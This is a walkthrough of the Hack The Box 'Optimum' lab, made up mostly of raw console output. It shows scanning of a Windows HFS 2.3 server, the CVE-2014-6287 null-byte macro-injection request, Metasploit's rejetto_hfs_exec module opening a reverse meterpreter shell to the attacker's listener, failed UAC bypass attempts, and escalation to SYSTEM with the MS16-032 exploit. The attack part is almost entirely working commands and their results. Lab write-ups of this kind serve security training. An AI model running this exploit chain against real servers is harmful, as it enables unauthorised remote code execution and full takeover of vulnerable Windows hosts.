HTB Optimum

$nmap -A -sV -p- 10.10.10.8

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-03 22:19 CEST
Nmap scan report for 10.10.10.8
Host is up (0.046s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   44.58 ms 10.10.14.1
2   44.74 ms 10.10.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.46 seconds

$nmap -p 80 --script vuln 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 17:05 CEST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.8
Host is up (0.042s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|   
|_    Couldn't find a file-type field.
| http-method-tamper:
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|              
|     Extra information:
|       
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     /~login [GENERIC]
|   
|     References:
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|       http://capec.mitre.org/data/definitions/274.html
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_      http://www.mkit.com.ar/labs/htexploit/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://www.tenable.com/plugins/nessus/55976
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.securityfocus.com/bid/49303

Nmap done: 1 IP address (1 host up) scanned in 259.07 seconds

$nikto -h 10.10.10.8

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.8
+ Target Hostname:    10.10.10.8
+ Target Port:        80
+ Start Time:         2020-07-03 22:28:03 (GMT2)
---------------------------------------------------------------------------
+ Server: HFS 2.3
+ Cookie HFS_SID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ 7864 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-07-03 22:47:29 (GMT2) (1166 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$searchsploit hfs

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service                                                                                                           | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                                                                                                                     | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                                                                                                                 | osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation                                                                                                          | osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                                                                                                  | windows/remote/37985.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                                                                                 | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                                                                                      | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities                                                                                                           | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                                              | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                                         | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                                         | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                                    | windows/webapps/34852.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

$cat /usr/share/exploitdb/exploits/windows/remote/346

# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

issue exists due to a poor regex in the file ParserLib.pas

function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;

it will not handle null byte so a request to

http://localhost:80/?search=%00{.exec|cmd.}

will stop regex from parse macro, and macro will be executed and remote code injection happen.

## EDB Note: This vulnerability will run the payload multiple times simultaneously.
##   Make sure to take this into consideration when crafting your payload (and/or listener).

msf5 > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Executi

msf5 > use 1

msf5 exploit(windows/http/rejetto_hfs_exec) >

msf5 exploit(windows/http/rejetto_hfs_exec) > options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8

rhost => 10.10.10.8

msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Using URL: http://0.0.0.0:8080/kyVqHTCln
[*] Local IP: http://192.168.21.129:8080/kyVqHTCln
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /kyVqHTCln
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.8:49185) at 2020-07-04 17:07:05 +0200
[!] Tried to delete %TEMP%\AkUaAWs.vbs, unknown result
[*] Server stopped.

meterpreter >

meterpreter > ls

Listing: C:\Users\kostas\Desktop
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2020-07-10 09:49:03 +0200  %TEMP%
100666/rw-rw-rw-  282     fil   2017-03-18 12:57:16 +0100  desktop.ini
100777/rwxrwxrwx  760320  fil   2014-02-16 12:58:52 +0100  hfs.exe
100444/r--r--r--  32      fil   2017-03-18 13:13:18 +0100  user.txt.txt
100666/rw-rw-rw-  1910    fil   2020-07-10 09:56:08 +0200  xTVFbX.txt

meterpreter > cat user.txt.txt

d0c3XXXXXXXXXXXXXXXXXXXXXXXXXXXX

meterpreter > getuid

Server username: OPTIMUM\kostas
meterpreter >

meterpreter > sysinfo

Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

Sysinfo shows that we are in a Windows 2012 R2 server with x64 bits architecture.

Due to the fact that the default reverse_tcp shell uses an x32 bits architecture, we should migrate this shell to the same architecture of the system.

meterpreter > ps

Process List
============

PID   PPID  Name                     Arch  Session  User            Path
---   ----  ----                     ----  -------  ----            ----
0     0     [System Process]                                        
4     0     System                                                  
228   4     smss.exe                                                
328   320   csrss.exe                                               
332   476   VGAuthService.exe                                       
380   320   wininit.exe                                             
392   372   csrss.exe                                               
436   372   winlogon.exe                                            
476   380   services.exe                                            
484   380   lsass.exe                                               
524   476   spoolsv.exe                                             
544   476   svchost.exe                                             
576   476   svchost.exe                                             
656   436   dwm.exe                                                 
668   476   svchost.exe                                             
712   476   svchost.exe                                             
764   476   svchost.exe                                             
804   476   svchost.exe                                             
836   476   svchost.exe                                             
964   476   svchost.exe                                             
1048  476   vmtoolsd.exe                                            
1064  476   ManagementAgentHost.exe                                 
1380  3020  PAYTwcGPiWOW.exe         x64   1        OPTIMUM\kostas  C:\Users\kostas\AppData\Local\Temp\radF96EB.tmp\PAYTwcGPiWOW.exe
1392  476   svchost.exe                                             
1448  476   dllhost.exe                                             
1612  544   WmiPrvSE.exe                                            
1676  476   msdtc.exe                                               
1800  2336  conhost.exe              x64   1        OPTIMUM\kostas  C:\Windows\System32\conhost.exe
1836  1984  conhost.exe              x64   1        OPTIMUM\kostas  C:\Windows\System32\conhost.exe
1984  1380  cmd.exe                  x64   1        OPTIMUM\kostas  C:\Windows\System32\cmd.exe
2040  2356  RMDGbbcoDuoYu.exe        x86   1        OPTIMUM\kostas  C:\Users\kostas\AppData\Local\Temp\radEBB9C.tmp\RMDGbbcoDuoYu.exe
2052  712   taskhostex.exe           x64   1        OPTIMUM\kostas  C:\Windows\System32\taskhostex.exe
2132  2076  explorer.exe             x64   1        OPTIMUM\kostas  C:\Windows\explorer.exe
2336  2040  cmd.exe                  x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\cmd.exe
2356  2588  wscript.exe              x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\wscript.exe
2560  2132  vmtoolsd.exe             x64   1        OPTIMUM\kostas  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2588  2132  hfs.exe                  x86   1        OPTIMUM\kostas  C:\Users\kostas\Desktop\hfs.exe
3020  2588  wscript.exe              x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\wscript.exe

Migrate command will perform the migration to x64 bits.

meterpreter > migrate 2132

[*] Migrating from 2040 to 2132...
[*] Migration completed successfully.
meterpreter >

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.8 - Collecting local exploits for x64/windows...
[*] 10.10.10.8 - 15 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
meterpreter > background
[*] Backgrounding session 1...

msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/local/bypassuac_dotnet_profiler
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > options

Module options (exploit/windows/local/bypassuac_dotnet_profiler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION                        yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 1

session => 1

msf5 exploit(windows/local/bypassuac_dotnet_profiler) > options

Module options (exploit/windows/local/bypassuac_dotnet_profiler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION       1                yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf5 exploit(windows/local/bypassuac_dotnet_profiler) >run

[*] Started reverse TCP handler on 192.168.21.129:4444
[*] UAC is Enabled, checking level...
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.

msf5 exploit(windows/local/bypassuac_dotnet_profiler) > use exploit/windows/local/bypassuac_sdclt
msf5 exploit(windows/local/bypassuac_sdclt) > options

Module options (exploit/windows/local/bypassuac_sdclt):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION                        yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf5 exploit(windows/local/bypassuac_sdclt) > set session 1

session => 1

msf5 exploit(windows/local/bypassuac_sdclt) > run

[*] Started reverse TCP handler on 192.168.21.129:4444
[*] UAC is Enabled, checking level...
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/bypassuac_sdclt) >

msf5 > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

msf5 > use 1
msf5 exploit(windows/http/rejetto_hfs_exec) > options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8

rhost => 10.10.10.8

msf5 exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.14.24

srvhost => 10.10.14.24

msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Using URL: http://10.10.14.24:8080/N7gLVUX
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /N7gLVUX
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.8:49192) at 2020-07-04 17:39:17 +0200
[!] Tried to delete %TEMP%\viwwLc.vbs, unknown result
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.24:4444 -> 10.10.10.8:49187) at 2020-07-04 17:39:23 +0200
[*] Server stopped.

meterpreter >

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.8 - Collecting local exploits for x64/windows...
[*] 10.10.10.8 - 15 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.

meterpreter > use post/multi/recon/local_exploit_suggester

Loading extension post/multi/recon/local_exploit_suggester...
[-] Failed to load extension: No module of the name post/multi/recon/local_exploit_suggester found

meterpreter > background

[*] Backgrounding session 2...

msf5 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1

session => 1

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 31 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1

session => 1

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.21.129:4444
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\ADtFWRG.ps1...
[*] Compressing script contents...
[+] Compressed size: 3592
[*] Executing exploit script...
__ __ ___ ___   ___     ___ ___ ___
|  V  |  _|_  | |  _|___|   |_  |_  |
|     |_  |_| |_| . |___| | |_  |  _|
|_|_|_|___|_____|___|   |___|___|___|
                                   
              [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2100

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2104
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

0oFgcUjn5k02ue1mt1nS733SgnkT4Qyu
[+] Executed on target machine.
[+] Deleted C:\Users\kostas\AppData\Local\Temp\ADtFWRG.ps1
[*] Exploit completed, but no session was created.

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.21.129   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.14.24

lhost => 10.10.14.24

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.24:4444
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\ULyzuEyTYsWRz.ps1...
[*] Compressing script contents...
[+] Compressed size: 3600
[*] Executing exploit script...
__ __ ___ ___   ___     ___ ___ ___
|  V  |  _|_  | |  _|___|   |_  |_  |
|     |_  |_| |_| . |___| | |_  |  _|
|_|_|_|___|_____|___|   |___|___|___|
                                   
              [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1420

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 1964
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

xmBLOvMWprzTob0dJLxTX8DP5bbzuk0z
[+] Executed on target machine.
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (10.10.14.24:4444 -> 10.10.10.8:49194) at 2020-07-04 17:46:24 +0200
[+] Deleted C:\Users\kostas\AppData\Local\Temp\ULyzuEyTYsWRz.ps1

meterpreter >

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > dir

Listing: C:\Users\kostas\Desktop
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2020-07-10 09:49:03 +0200  %TEMP%
100666/rw-rw-rw-  282     fil   2017-03-18 12:57:16 +0100  desktop.ini
100777/rwxrwxrwx  760320  fil   2014-02-16 12:58:52 +0100  hfs.exe
100444/r--r--r--  32      fil   2017-03-18 13:13:18 +0100  user.txt.txt
100666/rw-rw-rw-  1910    fil   2020-07-10 09:56:08 +0200  xTVFbX.txt

meterpreter >

meterpreter > cd ..
meterpreter > dir

Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-18 12:52:50 +0100  Administrator
40777/rwxrwxrwx   0     dir   2013-08-22 16:48:41 +0200  All Users
40555/r-xr-xr-x   0     dir   2013-08-22 15:36:16 +0200  Default
40777/rwxrwxrwx   0     dir   2013-08-22 16:48:41 +0200  Default User
40555/r-xr-xr-x   4096  dir   2013-08-22 15:36:16 +0200  Public
100666/rw-rw-rw-  174   fil   2013-08-22 17:39:32 +0200  desktop.ini
40777/rwxrwxrwx   8192  dir   2017-03-18 12:57:09 +0100  kostas

meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > dir

Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-18 12:52:56 +0100  desktop.ini
100444/r--r--r--  32    fil   2017-03-18 13:13:57 +0100  root.txt

meterpreter > cat root.txt

51edXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *